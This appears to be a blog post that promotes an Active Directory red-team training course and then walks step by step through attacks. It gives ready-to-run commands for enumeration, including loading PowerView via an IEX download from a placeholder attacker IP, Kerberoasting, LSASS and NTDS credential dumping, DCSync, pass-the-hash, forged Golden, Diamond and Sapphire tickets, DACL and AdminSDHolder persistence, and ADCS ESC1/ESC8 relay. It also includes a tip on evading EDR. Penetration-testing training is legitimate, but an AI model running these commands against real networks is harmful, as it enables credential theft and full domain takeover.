Listen to this Post
Introduction:
Active Directory (AD) remains the primary authentication and authorization backbone for over 90% of Fortune 500 companies, making it the most valuable target for attackers. This comprehensive training program by Ignite Technologies equips security professionals with hands-on techniques for initial exploitation, Kerberos abuse, advanced credential dumping, and modern AD CS attacks—transforming theory into offensive mastery.
Learning Objectives:
- Execute end-to-end Active Directory penetration testing from initial compromise to domain dominance.
- Master Kerberos-based attacks (Golden/Silver/Diamond/Sapphire tickets) and abuse DACLs for privilege escalation.
- Implement lateral movement, persistence mechanisms, and ADCS attack chains in lab environments.
You Should Know:
1. Initial Active Directory Exploitation & Enumeration
Start by identifying AD environment structure and potential entry vectors. The following steps simulate a red-team approach from an unprivileged domain-joined machine or initial foothold.
Step‑by‑step guide:
- Enumerate AD users, groups, and computers using PowerView (part of PowerSploit):
Load PowerView in memory powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker_ip>/PowerView.ps1'); Get-NetUser | select samaccountname" Get-NetGroup -GroupName "Domain Admins" Get-NetComputer | select dnshostname, operatingsystem - Use BloodHound to map attack paths:
On attacker machine, run SharpHound collector on target SharpHound.exe -c All --outputdirectory C:\Temp Import data into BloodHound (neo4j console) sudo bloodhound --no-sandbox
- Perform unauthenticated LDAP enumeration (if anonymous binding allowed):
ldapsearch -x -H ldap://<DC_IP> -b "DC=domain,DC=local" "(objectClass=user)" samaccountname
- Enumerate SMB shares:
smbclient -L \\<DC_IP> -N
2. Abusing Kerberos: AS-REP Roasting & Kerberoasting
Kerberos authentication misconfigurations allow extracting password hashes for offline cracking. These attacks require no credentials for AS-REP roasting and only a domain user for Kerberoasting.
Step‑by‑step guide:
- AS-REP Roasting – target users with “Do not require Kerberos preauthentication”:
Using Impacket impacket-GetNPUsers -dc-ip <DC_IP> domain.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
- Kerberoasting – extract service account hashes:
Using Rubeus on Windows Rubeus.exe kerberoast /outfile:kerb_hashes.txt Using Impacket from Linux impacket-GetUserSPNs -dc-ip <DC_IP> domain.local/validuser:password -request -outputfile kerberoast.txt
- Crack hashes with Hashcat:
hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt Kerberoast mode hashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txt AS-REP mode
- For Golden/Silver tickets, first dump krbtgt hash (requires Domain Admin). Example Golden ticket creation:
Using Mimikatz mimikatz.exe "kerberos::golden /domain:domain.local /sid:S-1-5-21-xxxx /krbtgt:hash /user:Administrator /ticket:ticket.kirbi" exit
3. Advanced Credential Dumping Attacks
After elevating privileges, extract credentials from LSASS, SAM, NTDS.dit, and cached credentials. Modern EDRs may block traditional methods, so use indirect techniques.
Step‑by‑step guide:
- Dump LSASS memory using procdump (less likely flagged than Mimikatz directly):
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then offline extract with Mimikatz:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
– Dump SAM and SYSTEM registry hives (works on all Windows):
reg save HKLM\sam sam.save reg save HKLM\system system.save
Extract hashes using Impacket:
impacket-secretsdump -sam sam.save -system system.save LOCAL
– Remote NTDS.dit extraction via Volume Shadow Copy (requires DA):
impacket-secretsdump -dc-ip <DC_IP> domain.local/administrator -hashes :<NTLM_hash> -just-dc
– Use Mimikatz’s DCSync attack to simulate replication and pull all domain hashes:
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt" exit
4. Privilege Escalation & DACL Abuse
Discretionary Access Control Lists (DACLs) often contain misconfigured ACEs allowing regular users to modify object permissions (e.g., Reset Password, Add Member to Group). This section focuses on abusing those.
Step‑by‑step guide:
- Enumerate high-value ACLs using PowerView:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "WriteProperty|ExtendedRight"} - If a user has `ForceChangePassword` rights on a DA account:
Set-DomainUserPassword -Identity target_admin -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force) -Verbose
- Abuse `GenericWrite` to add a user to a privileged group:
Add-DomainGroupMember -Identity "Domain Admins" -Member "attacker_user" -Verbose
- Use BloodHound to find DACL-based attack paths: query
Find all attack paths from owned principals to high value targets.
5. Lateral Movement & Persistence Methods
Move from compromised machine to other hosts without raising alerts. Persistence ensures re-entry after credential rotation.
Step‑by‑step guide:
- Pass-the-Hash (PtH) using Impacket:
impacket-wmiexec -hashes :<NTLM_hash> domain.local/user@<target_IP>
- Over-Pass-the-Hash (convert hash to Kerberos ticket):
mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:hash /run:powershell.exe"
- SMB Lateral Movement via PsExec:
impacket-psexec -hashes :<NTLM_hash> domain.local/user@<target_IP>
- Persistence via AdminSDHolder (modify ACL to propagate privileges):
Add-ObjectAcl -TargetADSprefix "CN=AdminSDHolder,CN=System" -PrincipalSamAccountName attacker -Rights All -Verbose
- Golden Ticket persistence (renewable indefinitely with krbtgt hash) – already covered.
6. ADCS Attacks (New) – ESC1 to ESC8
Active Directory Certificate Services (ADCS) misconfigurations allow domain escalation via certificate templates. ESC1 (enrollment with SAN) is the most critical.
Step‑by‑step guide:
- Enumerate ADCS using Certipy (Python):
certipy find -u [email protected] -p password -dc-ip <DC_IP> -scheme ldap
- ESC1 – Template allows client authentication and SAN specification. Request a certificate for Domain Admin:
certipy req -u [email protected] -p password -target <CA_IP> -template VulnTemplate -upn [email protected]
- Convert certificate to PFX and authenticate:
certipy auth -pfx administrator.pfx -dc-ip <DC_IP>
- ESC8 – NTLM relay to Web Enrollment endpoint. Run ntlmrelayx:
impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp -smb2support --adcs
- After certificate theft, use Rubeus for Kerberos PKINIT authentication:
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:pass /ptt
7. Diamond & Sapphire Ticket Attacks (Bonus)
These advanced Kerberos techniques modify legitimate TGTs (Diamond) or craft tickets with valid encrypted parts (Sapphire) to bypass detection based on Golden/Silver ticket signatures.
Step‑by‑step guide:
- Diamond Ticket – Decrypt a valid TGT, modify the user data, re-encrypt with krbtgt hash:
Using Rubeus (latest version) Rubeus.exe diamond /krbkey:krbtgt_aes256_hash /user:anyuser /password:pass /enctype:aes256 /tgtdeleg /ticketoutput:diamond.kirbi
- Sapphire Ticket – Forge an entire TGT without requesting one, but reuse the authenticator encrypted part:
Manual crafting using Impacket's ticketer with -extra-pac option impacket-ticketer -domain domain.local -user-id 500 -extra-pac -aesKey krbtgt_aes256 -domain-sid S-1-5-21-xxxx "Administrator"
- Load ticket into current session:
mimikatz.exe "kerberos::ptt diamond.kirbi" exit
- Verify access to domain controller:
dir \DC.domain.local\c$
What Undercode Say:
- Key Takeaway 1: Modern AD attacks no longer rely solely on Golden Tickets; DACL abuse, ADCS misconfigurations, and Diamond/Sapphire tickets are now the stealthiest paths to domain compromise. Defenders must audit certificate templates and LDAP permissions aggressively.
- Key Takeaway 2: Training like Ignite Technologies’ program bridges the gap between theoretical CTF knowledge and real-world enterprise red teaming. Mastering tools like Certipy, Rubeus, and PowerView in an AD lab environment is non-negotiable for offensive security professionals.
Analysis: Active Directory remains the crown jewel of internal networks. The shift to cloud-hybrid identities (Azure AD Connect, Entra ID) introduces new attack surfaces, but on-prem AD persistence techniques still work in most organizations due to legacy dependencies. The training topics (DACL abuse, ADCS, credential dumping) reflect current threat actor TTPs observed in ransomware and APT intrusions (e.g., LockBit, BlackCat). For defenders, implementing Tier 0 administrative forests, regularly rotating krbtgt password (twice), and monitoring Event IDs 4768/4769 for anomalous Kerberos tickets are critical mitigations.
Prediction:
Within 18 months, ADCS misconfigurations will overtake Kerberoasting as the number one AD escalation vector, especially with tooling improvements in Certipy and automated scanners. Simultaneously, Microsoft will introduce mandatory certificate template hardening via Group Policy updates, forcing red teams to pivot to ACL-based abuse and cloud-joined identity attacks. Organizations still running Windows Server 2016 or older AD functional levels will face disproportionate risk. Expect a surge in demand for AD-specific breach and attack simulation (BAS) platforms that test Diamond/Sapphire ticket resilience.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Yashika Dhir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
